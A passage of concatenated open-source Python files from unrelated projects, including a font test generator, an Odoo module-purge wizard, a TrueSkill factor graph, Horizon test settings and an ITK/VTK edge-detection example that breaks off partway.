passGlyphMetrics = hmtx["P"]
# grab some tables
hmtx = shell["hmtx"]
cmap = shell["cmap"]
# start the glyph order
existingGlyphs = [".notdef", "space", "F", "P"]
glyphOrder = list(existingGlyphs)
# start the CFF
cff = shell["CFF "].cff
globalSubrs = cff.GlobalSubrs
topDict = cff.topDictIndex[0]
topDict.charset = existingGlyphs
private = topDict.Private
charStrings = topDict.CharStrings
charStringsIndex = charStrings.charStringsIndex
features = sorted(mapping)
# build the outline, hmtx and cmap data
cp = baseCodepoint
for index, tag in enumerate(features):
# tag.pass
glyphName = "%s.pass" % tag
glyphOrder.append(glyphName)
addGlyphToCFF(
glyphName=glyphName,
program=passGlyphProgram,
private=private,
globalSubrs=globalSubrs,
charStringsIndex=charStringsIndex,
topDict=topDict,
charStrings=charStrings
)
hmtx[glyphName] = passGlyphMetrics
for table in cmap.tables:
if table.format == 4:
table.cmap[cp] = glyphName
else:
raise NotImplementedError, "Unsupported cmap table format: %d" % table.format
cp += 1
# tag.fail
glyphName = "%s.fail" % tag
glyphOrder.append(glyphName)
addGlyphToCFF(
glyphName=glyphName,
program=failGlyphProgram,
private=private,
globalSubrs=globalSubrs,
charStringsIndex=charStringsIndex,
topDict=topDict,
charStrings=charStrings
)
hmtx[glyphName] = failGlyphMetrics
for table in cmap.tables:
if table.format == 4:
table.cmap[cp] = glyphName
else:
raise NotImplementedError, "Unsupported cmap table format: %d" % table.format
# bump this up so that the sequence is the same as the lookup 3 font
cp += 3
# set the glyph order
shell.setGlyphOrder(glyphOrder)
# start the GSUB
shell["GSUB"] = newTable("GSUB")
gsub = shell["GSUB"].table = GSUB()
gsub.Version = 1.0
# make a list of all the features we will make
featureCount = len(features)
# set up the script list
scriptList = gsub.ScriptList = ScriptList()
scriptList.ScriptCount = 1
scriptList.ScriptRecord = []
scriptRecord = ScriptRecord()
scriptList.ScriptRecord.append(scriptRecord)
scriptRecord.ScriptTag = "DFLT"
script = scriptRecord.Script = Script()
defaultLangSys = script.DefaultLangSys = DefaultLangSys()
defaultLangSys.FeatureCount = featureCount
defaultLangSys.FeatureIndex = range(defaultLangSys.FeatureCount)
defaultLangSys.ReqFeatureIndex = 65535
defaultLangSys.LookupOrder = None
script.LangSysCount = 0
script.LangSysRecord = []
# set up the feature list
featureList = gsub.FeatureList = FeatureList()
featureList.FeatureCount = featureCount
featureList.FeatureRecord = []
for index, tag in enumerate(features):
# feature record
featureRecord = FeatureRecord()
featureRecord.FeatureTag = tag
feature = featureRecord.Feature = Feature()
featureList.FeatureRecord.append(featureRecord)
# feature
feature.FeatureParams = None
feature.LookupCount = 1
feature.LookupListIndex = [index]
# write the lookups
lookupList = gsub.LookupList = LookupList()
lookupList.LookupCount = featureCount
lookupList.Lookup = []
for tag in features:
# lookup
lookup = Lookup()
lookup.LookupType = 1
lookup.LookupFlag = 0
lookup.SubTableCount = 1
lookup.SubTable = []
lookupList.Lookup.append(lookup)
# subtable
subtable = SingleSubst()
subtable.Format = 2
subtable.LookupType = 1
subtable.mapping = {
"%s.pass" % tag : "%s.fail" % tag,
"%s.fail" % tag : "%s.pass" % tag,
}
lookup.SubTable.append(subtable)
path = outputPath % 1 + ".otf"
if os.path.exists(path):
os.remove(path)
shell.save(path)
# get rid of the shell
if os.path.exists(shellTempPath):
os.remove(shellTempPath)
def makeLookup3():
# make a variation of the shell TTX data
f = open(shellSourcePath)
ttxData = f.read()
f.close()
ttxData = ttxData.replace("__familyName__", "gsubtest-lookup3")
tempShellSourcePath = shellSourcePath + ".temp"
f = open(tempShellSourcePath, "wb")
f.write(ttxData)
f.close()
# compile the shell
shell = TTFont(sfntVersion="OTTO")
shell.importXML(tempShellSourcePath)
shell.save(shellTempPath)
os.remove(tempShellSourcePath)
# load the shell
shell = TTFont(shellTempPath)
# grab the PASS and FAIL data
hmtx = shell["hmtx"]
glyphSet = shell.getGlyphSet()
failGlyph = glyphSet["F"]
failGlyph.decompile()
failGlyphProgram = list(failGlyph.program)
failGlyphMetrics = hmtx["F"]
passGlyph = glyphSet["P"]
passGlyph.decompile()
passGlyphProgram = list(passGlyph.program)
passGlyphMetrics = hmtx["P"]
# grab some tables
hmtx = shell["hmtx"]
cmap = shell["cmap"]
# start the glyph order
existingGlyphs = [".notdef", "space", "F", "P"]
glyphOrder = list(existingGlyphs)
# start the CFF
cff = shell["CFF "].cff
globalSubrs = cff.GlobalSubrs
topDict = cff.topDictIndex[0]
topDict.charset = existingGlyphs
private = topDict.Private
charStrings = topDict.CharStrings
charStringsIndex = charStrings.charStringsIndex
features = sorted(mapping)
# build the outline, hmtx and cmap data
cp = baseCodepoint
for index, tag in enumerate(features):
# tag.pass
glyphName = "%s.pass" % tag
glyphOrder.append(glyphName)
addGlyphToCFF(
glyphName=glyphName,
program=passGlyphProgram,
private=private,
globalSubrs=globalSubrs,
charStringsIndex=charStringsIndex,
topDict=topDict,
charStrings=charStrings
)
hmtx[glyphName] = passGlyphMetrics
# tag.fail
glyphName = "%s.fail" % tag
glyphOrder.append(glyphName)
addGlyphToCFF(
glyphName=glyphName,
program=failGlyphProgram,
private=private,
globalSubrs=globalSubrs,
charStringsIndex=charStringsIndex,
topDict=topDict,
charStrings=charStrings
)
hmtx[glyphName] = failGlyphMetrics
# tag.default
glyphName = "%s.default" % tag
glyphOrder.append(glyphName)
addGlyphToCFF(
glyphName=glyphName,
program=passGlyphProgram,
private=private,
globalSubrs=globalSubrs,
charStringsIndex=charStringsIndex,
topDict=topDict,
charStrings=charStrings
)
hmtx[glyphName] = passGlyphMetrics
for table in cmap.tables:
if table.format == 4:
table.cmap[cp] = glyphName
else:
raise NotImplementedError, "Unsupported cmap table format: %d" % table.format
cp += 1
# tag.alt1,2,3
for i in range(1,4):
glyphName = "%s.alt%d" % (tag, i)
glyphOrder.append(glyphName)
addGlyphToCFF(
glyphName=glyphName,
program=failGlyphProgram,
private=private,
globalSubrs=globalSubrs,
charStringsIndex=charStringsIndex,
topDict=topDict,
charStrings=charStrings
)
hmtx[glyphName] = failGlyphMetrics
for table in cmap.tables:
if table.format == 4:
table.cmap[cp] = glyphName
else:
raise NotImplementedError, "Unsupported cmap table format: %d" % table.format
cp += 1
# set the glyph order
shell.setGlyphOrder(glyphOrder)
# start the GSUB
shell["GSUB"] = newTable("GSUB")
gsub = shell["GSUB"].table = GSUB()
gsub.Version = 1.0
# make a list of all the features we will make
featureCount = len(features)
# set up the script list
scriptList = gsub.ScriptList = ScriptList()
scriptList.ScriptCount = 1
scriptList.ScriptRecord = []
scriptRecord = ScriptRecord()
scriptList.ScriptRecord.append(scriptRecord)
scriptRecord.ScriptTag = "DFLT"
script = scriptRecord.Script = Script()
defaultLangSys = script.DefaultLangSys = DefaultLangSys()
defaultLangSys.FeatureCount = featureCount
defaultLangSys.FeatureIndex = range(defaultLangSys.FeatureCount)
defaultLangSys.ReqFeatureIndex = 65535
defaultLangSys.LookupOrder = None
script.LangSysCount = 0
script.LangSysRecord = []
# set up the feature list
featureList = gsub.FeatureList = FeatureList()
featureList.FeatureCount = featureCount
featureList.FeatureRecord = []
for index, tag in enumerate(features):
# feature record
featureRecord = FeatureRecord()
featureRecord.FeatureTag = tag
feature = featureRecord.Feature = Feature()
featureList.FeatureRecord.append(featureRecord)
# feature
feature.FeatureParams = None
feature.LookupCount = 1
feature.LookupListIndex = [index]
# write the lookups
lookupList = gsub.LookupList = LookupList()
lookupList.LookupCount = featureCount
lookupList.Lookup = []
for tag in features:
# lookup
lookup = Lookup()
lookup.LookupType = 3
lookup.LookupFlag = 0
lookup.SubTableCount = 1
lookup.SubTable = []
lookupList.Lookup.append(lookup)
# subtable
subtable = AlternateSubst()
subtable.Format = 1
subtable.LookupType = 3
subtable.alternates = {
"%s.default" % tag : ["%s.fail" % tag, "%s.fail" % tag, "%s.fail" % tag],
"%s.alt1" % tag : ["%s.pass" % tag, "%s.fail" % tag, "%s.fail" % tag],
"%s.alt2" % tag : ["%s.fail" % tag, "%s.pass" % tag, "%s.fail" % tag],
"%s.alt3" % tag : ["%s.fail" % tag, "%s.fail" % tag, "%s.pass" % tag]
}
lookup.SubTable.append(subtable)
path = outputPath % 3 + ".otf"
if os.path.exists(path):
os.remove(path)
shell.save(path)
# get rid of the shell
if os.path.exists(shellTempPath):
os.remove(shellTempPath)
def makeJavascriptData():
features = sorted(mapping)
outStr = []
outStr.append("")
outStr.append("/* This file is autogenerated by makegsubfonts.py */")
outStr.append("")
outStr.append("/* ")
outStr.append(" Features defined in gsubtest fonts with associated base")
outStr.append(" codepoints for each feature:")
outStr.append("")
outStr.append(" cp = codepoint for feature featX")
outStr.append("")
outStr.append(" cp default PASS")
outStr.append(" cp featX=1 FAIL")
outStr.append(" cp featX=2 FAIL")
outStr.append("")
outStr.append(" cp+1 default FAIL")
outStr.append(" cp+1 featX=1 PASS")
outStr.append(" cp+1 featX=2 FAIL")
outStr.append("")
outStr.append(" cp+2 default FAIL")
outStr.append(" cp+2 featX=1 FAIL")
outStr.append(" cp+2 featX=2 PASS")
outStr.append("")
outStr.append("*/")
outStr.append("")
outStr.append("var gFeatures = {");
cp = baseCodepoint
taglist = []
for tag in features:
taglist.append("\"%s\": 0x%x" % (tag, cp))
cp += 4
outStr.append(textwrap.fill(", ".join(taglist), initial_indent=" ", subsequent_indent=" "))
outStr.append("};");
outStr.append("");
if os.path.exists(javascriptData):
os.remove(javascriptData)
f = open(javascriptData, "wb")
f.write("\n".join(outStr))
f.close()
# build fonts
print "Making lookup type 1 font..."
makeLookup1()
print "Making lookup type 3 font..."
makeLookup3()
# output javascript data
print "Making javascript data file..."
makeJavascriptData()
| mpl-2.0 |
discogs/python-livingdocs | src/livingdocs/static_site.py | 1 | 1371 | import shutil
import os
class StaticSite(object):
def __init__(self, title='', description='', baseurl=''):
self.title = title
self.description = description
self.baseurl = baseurl
def create(self, path="livingdocs"):
"""
Scaffolds a simple Hugo static site build.
"""
os.makedirs(path)
dirs = ['layouts', 'static']
for d in dirs:
template = u'site_files/%s' % d
directory = os.path.join(os.path.dirname(__file__), template)
self.copy(directory,
u'livingdocs/%s' % d)
print(u'added %s' % d)
self.make_config()
def make_config(self):
"""
Creates config.toml
"""
with open(u"livingdocs/config.toml", "a") as cfg:
cfg.write(u"baseurl = '%s'\n" % self.baseurl)
cfg.write(u"title = '%s'\n" % self.title)
cfg.write(u"description = '%s'\n" % self.description)
cfg.write(u"languageCode = 'en-us'\n")
cfg.write(u"SectionPagesMenu = 'main'\n")
cfg.write(u"\n")
cfg.write(u"[taxonomies]\n")
cfg.write(u"tag = \"tags\"\n")
def copy(self, src, dest):
"""
Copies both directories and files to a
given destination.
"""
shutil.copytree(src, dest)
| bsd-2-clause |
Vauxoo/server-tools | database_cleanup/models/purge_modules.py | 2 | 3569 | # Copyright 2014-2016 Therp BV <http://therp.nl>
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
# pylint: disable=consider-merging-classes-inherited
from odoo import _, api, fields, models
from odoo.exceptions import UserError
from odoo.modules.module import get_module_path
from odoo.addons.base.models.ir_model import MODULE_UNINSTALL_FLAG
class IrModelData(models.Model):
_inherit = 'ir.model.data'
@api.model
def _module_data_uninstall(self, modules_to_remove):
"""this function crashes for xmlids on undefined models or fields
referring to undefined models"""
for this in self.search([('module', 'in', modules_to_remove)]):
if this.model == 'ir.model.fields':
field = self.env[this.model].with_context(
**{MODULE_UNINSTALL_FLAG: True}).browse(this.res_id)
if not field.exists() or field.model not in self.env:
this.unlink()
continue
if this.model not in self.env:
this.unlink()
return super(IrModelData, self)._module_data_uninstall(
modules_to_remove)
class CleanupPurgeLineModule(models.TransientModel):
_inherit = 'cleanup.purge.line'
_name = 'cleanup.purge.line.module'
wizard_id = fields.Many2one(
'cleanup.purge.wizard.module', 'Purge Wizard', readonly=True)
@api.multi
def purge(self):
"""
Uninstall modules upon manual confirmation, then reload
the database.
"""
module_names = self.filtered(lambda x: not x.purged).mapped('name')
modules = self.env['ir.module.module'].search([
('name', 'in', module_names)
])
if not modules:
return True
self.logger.info('Purging modules %s', ', '.join(module_names))
modules.filtered(
lambda x: x.state == 'to install'
).write({'state': 'uninstalled'})
modules.filtered(
lambda x: x.state in ('to upgrade', 'to remove')
).write({'state': 'installed'})
modules.filtered(
lambda x: x.state == 'installed' and x.name != 'base'
).button_immediate_uninstall()
modules.refresh()
modules.filtered(
lambda x: x.state not in (
'installed', 'to upgrade', 'to remove', 'to install')
).unlink()
return self.write({'purged': True})
class CleanupPurgeWizardModule(models.TransientModel):
_inherit = 'cleanup.purge.wizard'
_name = 'cleanup.purge.wizard.module'
_description = 'Purge modules'
@api.model
def find(self):
res = []
purge_lines = self.env['cleanup.purge.line.module']
IrModule = self.env['ir.module.module']
for module in IrModule.search(
[
('to_buy', '=', False),
('name', '!=', 'studio_customization')
]
):
if get_module_path(module.name, display_warning=False):
continue
if module.state == 'uninstalled':
purge_lines += self.env['cleanup.purge.line.module'].create({
'name': module.name,
})
continue
res.append((0, 0, {'name': module.name}))
purge_lines.purge()
if not res:
raise UserError(_('No modules found to purge'))
return res
purge_line_ids = fields.One2many(
'cleanup.purge.line.module', 'wizard_id', 'Modules to purge')
| agpl-3.0 |
Smashman/mods.tf | alembic/versions/4db12e0c5745_initial_pass.py | 1 | 1247 | """Initial pass
Revision ID: 4db12e0c5745
Revises: None
Create Date: 2014-07-05 15:30:34.596840
"""
# revision identifiers, used by Alembic.
revision = '4db12e0c5745'
down_revision = None
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('users',
sa.Column('account_id', sa.Integer(), autoincrement=False, nullable=False),
sa.Column('name', sa.String(length=256, collation='utf8_swedish_ci'), nullable=True),
sa.Column('profile_url', sa.String(length=128), nullable=True),
sa.Column('avatar_small', sa.String(length=128), nullable=True),
sa.Column('avatar_medium', sa.String(length=128), nullable=True),
sa.Column('avatar_large', sa.String(length=128), nullable=True),
sa.Column('joined', sa.DateTime(), nullable=False),
sa.Column('last_seen', sa.DateTime(), nullable=False),
sa.Column('user_class', sa.Integer(), nullable=True),
sa.Column('enabled', sa.Boolean(), nullable=True),
sa.PrimaryKeyConstraint('account_id')
)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_table('users')
### end Alembic commands ###
| gpl-3.0 |
Manwe56/trueskill-ai-contest-test-tool | trueskill/trueskill/factorgraph.py | 1 | 5876 | # -*- coding: utf-8 -*-
"""
trueskill.factorgraph
~~~~~~~~~~~~~~~~~~~~~
This module contains nodes for the factor graph of TrueSkill algorithm.
:copyright: (c) 2012-2013 by Heungsub Lee.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
import itertools
import math
from .mathematics import Gaussian, inf
__all__ = ['Variable', 'PriorFactor', 'LikelihoodFactor', 'SumFactor',
'TruncateFactor']
class Node(object):
pass
class Variable(Node, Gaussian):
def __init__(self):
self.messages = {}
super(Variable, self).__init__()
def set(self, val):
delta = self.delta(val)
self.pi, self.tau = val.pi, val.tau
return delta
def delta(self, other):
pi_delta = abs(self.pi - other.pi)
if pi_delta == inf:
return 0.
return max(abs(self.tau - other.tau), math.sqrt(pi_delta))
def update_message(self, factor, pi=0, tau=0, message=None):
message = message or Gaussian(pi=pi, tau=tau)
old_message, self[factor] = self[factor], message
return self.set(self / old_message * message)
def update_value(self, factor, pi=0, tau=0, value=None):
value = value or Gaussian(pi=pi, tau=tau)
old_message = self[factor]
self[factor] = value * old_message / self
return self.set(value)
def __getitem__(self, factor):
return self.messages[factor]
def __setitem__(self, factor, message):
self.messages[factor] = message
def __repr__(self):
args = (type(self).__name__, super(Variable, self).__repr__(),
len(self.messages), '' if len(self.messages) == 1 else 's')
return '<%s %s with %d connection%s>' % args
class Factor(Node):
def __init__(self, vars):
self.vars = vars
for var in vars:
var[self] = Gaussian()
def down(self):
return 0
def up(self):
return 0
@property
def var(self):
assert len(self.vars) == 1
return self.vars[0]
def __repr__(self):
args = (type(self).__name__, len(self.vars),
'' if len(self.vars) == 1 else 's')
return '<%s with %d connection%s>' % args
class PriorFactor(Factor):
def __init__(self, var, val, dynamic=0):
super(PriorFactor, self).__init__([var])
self.val = val
self.dynamic = dynamic
def down(self):
sigma = math.sqrt(self.val.sigma ** 2 + self.dynamic ** 2)
value = Gaussian(self.val.mu, sigma)
return self.var.update_value(self, value=value)
class LikelihoodFactor(Factor):
def __init__(self, mean_var, value_var, variance):
super(LikelihoodFactor, self).__init__([mean_var, value_var])
self.mean = mean_var
self.value = value_var
self.variance = variance
def down(self):
# update value
val = self.mean
msg = val / self.mean[self]
pi = 1. / self.variance
a = pi / (pi + val.pi)
return self.value.update_message(self, a * msg.pi, a * msg.tau)
def up(self):
# update mean
val = self.value
msg = val / self.value[self]
a = 1. / (1 + self.variance * msg.pi)
return self.mean.update_message(self, a * msg.pi, a * msg.tau)
class SumFactor(Factor):
def __init__(self, sum_var, term_vars, coeffs):
super(SumFactor, self).__init__([sum_var] + term_vars)
self.sum = sum_var
self.terms = term_vars
self.coeffs = coeffs
def down(self):
vals = self.terms
msgs = [var[self] for var in vals]
return self.update(self.sum, vals, msgs, self.coeffs)
def up(self, index=0):
coeff = self.coeffs[index]
coeffs = []
for x, c in enumerate(self.coeffs):
try:
if x == index:
coeffs.append(1. / coeff)
else:
coeffs.append(-c / coeff)
except ZeroDivisionError:
coeffs.append(0.)
vals = self.terms[:]
vals[index] = self.sum
msgs = [var[self] for var in vals]
return self.update(self.terms[index], vals, msgs, coeffs)
def update(self, var, vals, msgs, coeffs):
pi_inv = 0
mu = 0
for val, msg, coeff in itertools.izip(vals, msgs, coeffs):
div = val / msg
mu += coeff * div.mu
if pi_inv == inf:
continue
try:
# numpy.float64 handles floating-point error by different way.
# For example, it can just warn RuntimeWarning on n/0 problem
# instead of throwing ZeroDivisionError. So div.pi, the
# denominator has to be a built-in float.
pi_inv += coeff ** 2 / float(div.pi)
except ZeroDivisionError:
pi_inv = inf
pi = 1. / pi_inv
tau = pi * mu
return var.update_message(self, pi, tau)
class TruncateFactor(Factor):
def __init__(self, var, v_func, w_func, draw_margin):
super(TruncateFactor, self).__init__([var])
self.v_func = v_func
self.w_func = w_func
self.draw_margin = draw_margin
def up(self):
val = self.var
msg = self.var[self]
div = val / msg
sqrt_pi = math.sqrt(div.pi)
args = (div.tau / sqrt_pi, self.draw_margin * sqrt_pi)
v = self.v_func(*args)
w = self.w_func(*args)
denom = (1. - w)
pi, tau = div.pi / denom, (div.tau + sqrt_pi * v) / denom
return val.update_value(self, pi, tau)
| gpl-2.0 |
AntoineLee/spider163 | spider163/www/web.py | 1 | 1330 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from flask import Flask, request, json, jsonify
from flask import render_template,make_response
from spider163.spider import playlist
from spider163.utils import pysql
import json
app = Flask(__name__, static_path='/static')
@app.route("/")
def index():
return render_template('index.html')
@app.route("/spider")
def spider(type=None):
return render_template('spider.html')
@app.route("/spider/getPlaylist", methods=['POST'])
def get_playlist():
pl = playlist.Playlist()
return jsonify({"test": request.form["gdType"]})
@app.route("/stat")
def statistics():
return render_template('stat.html')
@app.route("/stat/playlist")
def stat_playlist():
return jsonify(pysql.stat_playlist())
@app.route("/stat/music")
def stat_music():
return jsonify(pysql.stat_music())
@app.route("/stat/dataCount")
def stat_data():
return jsonify(pysql.stat_data())
@app.route("/scan")
def scan():
return render_template('scan.html')
@app.route("/scan/data")
def scan_data():
return jsonify(pysql.random_data())
@app.route("/business")
def business():
return make_response(open('templates/business.html').read())
if __name__ == "__main__":
app.jinja_env.auto_reload = True
app.config['TEMPLATES_AUTO_RELOAD'] = True
app.run()
| mit |
asedunov/intellij-community | python/testData/inspections/PyTypeCheckerInspection/FunctionReturnTypePy3.py | 24 | 1200 | from typing import List, Optional, Union
def a(x: List[int]) -> List[str]:
return <warning descr="Expected type 'List[str]', got 'List[List[int]]' instead">[x]</warning>
def b(x: int) -> List[str]:
return <warning descr="Expected type 'List[str]', got 'List[int]' instead">[1,2]</warning>
def c() -> int:
return <warning descr="Expected type 'int', got 'str' instead">'abc'</warning>
def d(x: int) -> List[str]:
return [str(x)]
def e() -> int:
pass
def f() -> Optional[str]:
x = int(input())
if x > 0:
return <warning descr="Expected type 'Optional[str]', got 'int' instead">42</warning>
elif x == 0:
return 'abc'
else:
return
def g(x) -> int:
if x:
return <warning descr="Expected type 'int', got 'str' instead">'abc'</warning>
else:
return <warning descr="Expected type 'int', got 'dict' instead">{}</warning>
def h(x) -> int:
<warning descr="Expected type 'int', got 'None' instead">return</warning>
def i() -> Union[int, str]:
pass
def j(x) -> <warning descr="Expected to return 'Union[int, str]', got no return">Union[int, str]</warning>:
x = 42
def k() -> None:
if True:
pass | apache-2.0 |
aclifton/cpeg853-gem5 | src/python/m5/internal/__init__.py | 66 | 1575 | # Copyright (c) 2006 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Nathan Binkert
| bsd-3-clause |
394954369/horizon | horizon/test/settings.py | 1 | 5201 | # Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import socket
import sys
import django
from django.utils import html_parser
import xstatic.main
import xstatic.pkg.jquery
from horizon.test import patches
# Patch django.utils.html_parser.HTMLParser as a workaround for bug 1273943
if django.get_version() == '1.4' and sys.version_info[:3] > (2, 7, 3):
html_parser.HTMLParser.parse_starttag = patches.parse_starttag_patched
socket.setdefaulttimeout(1)
LOGIN_URL = '/auth/login/'
LOGOUT_URL = '/auth/logout/'
LOGIN_REDIRECT_URL = '/'
ROOT_PATH = os.path.dirname(os.path.abspath(__file__))
DEBUG = False
TEMPLATE_DEBUG = DEBUG
TESTSERVER = 'http://testserver'
SECRET_KEY = 'elj1IWiLoWHgcyYxFVLj7cM5rGOOxWl0'
USE_I18N = True
USE_L10N = True
USE_TZ = True
DATABASES = {'default': {'ENGINE': 'django.db.backends.sqlite3'}}
DEFAULT_EXCEPTION_REPORTER_FILTER = 'horizon.exceptions.HorizonReporterFilter'
INSTALLED_APPS = (
'django.contrib.sessions',
'django.contrib.staticfiles',
'django.contrib.messages',
'django.contrib.humanize',
'django.contrib.auth',
'django.contrib.contenttypes',
'django_nose',
'compressor',
'horizon',
'horizon.test',
'horizon.test.test_dashboards.cats',
'horizon.test.test_dashboards.dogs'
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.doc.XViewMiddleware',
'django.middleware.locale.LocaleMiddleware',
'horizon.middleware.HorizonMiddleware')
TEMPLATE_CONTEXT_PROCESSORS = (
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.request',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.contrib.messages.context_processors.messages',
'horizon.context_processors.horizon')
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
'horizon.loaders.TemplateLoader'
)
STATIC_URL = '/static/'
MESSAGE_STORAGE = 'django.contrib.messages.storage.cookie.CookieStorage'
ROOT_URLCONF = 'horizon.test.urls'
TEMPLATE_DIRS = (os.path.join(ROOT_PATH, 'tests', 'templates'),)
SITE_ID = 1
SITE_BRANDING = 'Horizon'
TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
NOSE_ARGS = ['--nocapture',
'--nologcapture',
'--exclude-dir=horizon/conf/',
'--exclude-dir=horizon/test/customization',
'--cover-package=horizon',
'--cover-inclusive',
'--all-modules']
EMAIL_BACKEND = 'django.core.mail.backends.locmem.EmailBackend'
SESSION_ENGINE = 'django.contrib.sessions.backends.signed_cookies'
SESSION_COOKIE_HTTPONLY = True
SESSION_EXPIRE_AT_BROWSER_CLOSE = True
SESSION_COOKIE_SECURE = False
HORIZON_CONFIG = {
'dashboards': ('cats', 'dogs'),
'default_dashboard': 'cats',
"password_validator": {
"regex": '^.{8,18}$',
"help_text": "Password must be between 8 and 18 characters."
},
'user_home': None,
'help_url': "http://example.com",
}
COMPRESS_ENABLED = True
COMPRESS_OFFLINE = False
COMPRESS_ROOT = "/tmp/"
COMPRESS_PARSER = 'compressor.parser.HtmlParser'
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'compressor.finders.CompressorFinder',
)
STATICFILES_DIRS = (
('horizon/lib/jquery', xstatic.main.XStatic(xstatic.pkg.jquery).base_dir),
)
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'null': {
'level': 'DEBUG',
'class': 'django.utils.log.NullHandler',
},
'test': {
'level': 'ERROR',
'class': 'logging.StreamHandler',
}
},
'loggers': {
'django.db.backends': {
'handlers': ['null'],
'propagate': False,
},
'horizon': {
'handlers': ['test'],
'propagate': False,
},
'nose.plugins.manager': {
'handlers': ['null'],
'propagate': False,
},
'selenium': {
'handlers': ['null'],
'propagate': False,
}
}
}
| apache-2.0 |
spinicist/ITK | Examples/Visualization/CannyEdgeDetectionImageFilterConnectVTKITK.py | 4 | 3820 | #==========================================================================
#
# Copyright Insight Software Consortium
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#==========================================================================*/
# This file demonstrates how to connect VTK and ITK pipelines together
# in scripted languages with the new ConnectVTKITK wrapping functionality.
# Data is loaded in with VTK, processed with ITK and written back to disc
# with VTK.
#
# For this to work, you have to build InsightApplications/ConnectVTKITK
# as well.
#
# It also demonstrates the use of the python-specific itkPyCommand object.
#
# -- Charl P. Botha <cpbotha AT ieee.org>
import os
import sys
import InsightToolkit as itk
import ConnectVTKITKPython as CVIPy
import vtk
# VTK will read the PNG image for us
reader = vtk.vtkPNGReader()
reader.SetFileName("../../Testing/Data/Input/cthead1.png")
# it has to be a single component, itk::VTKImageImport doesn't support more
lum = vtk.vtkImageLuminance()
lum.SetInput(reader.GetOutput())
# let's cast the output to float
imageCast = vtk.vtkImageCast()
imageCast.SetOutputScalarTypeToFloat()
imageCast.SetInput(lum.GetOutput())
# the end-point of this VTK pipeline segment is a vtkImageExport
vtkExporter = vtk.vtkImageExport()
vtkExporter.SetInput(imageCast.GetOutput())
# it connects to the itk::VTKImageImport at the beginning of
# the subsequent ITK pipeline; two-dimensional float type
itkImporter = itk.itkVTKImageImportF2_New()
# Call the magic function that connects the two. This will only be
# available if you built ITK with ITK_CSWIG_CONNECTVTKITK set to ON.
CVIPy.ConnectVTKToITKF2(vtkExporter, itkImporter.GetPointer())
# perform a canny edge detection and rescale the output
canny = itk.itkCannyEdgeDetectionImageFilterF2F2_New()
rescaler = itk.itkRescaleIntensityImageFilterF2US2_New()
canny.SetInput(itkImporter.GetOutput())
rescaler.SetInput(canny.GetOutput())
rescaler.SetOutputMinimum(0)
rescaler.SetOutputMaximum(65535)
# this is to show off the new PyCommand functionality. :)
def progressEvent():
print "%.0f%s done..." % (canny.GetProgress() * 100.0, '%')
pc = itk.itkPyCommand_New()
pc.SetCommandCallable(progressEvent)
canny.AddObserver(itk.itkProgressEvent(), pc.GetPointer())
# end of show-off
# this will form the end-point of the ITK pipeline segment
itkExporter = itk.itkVTKImageExportUS2_New()
itkExporter.SetInput(rescaler.GetOutput())
# the vtkImageImport will bring our data back into VTK-land
vtkImporter = vtk.vtkImageImport()
# do the magic connection call (once again: only available if you built
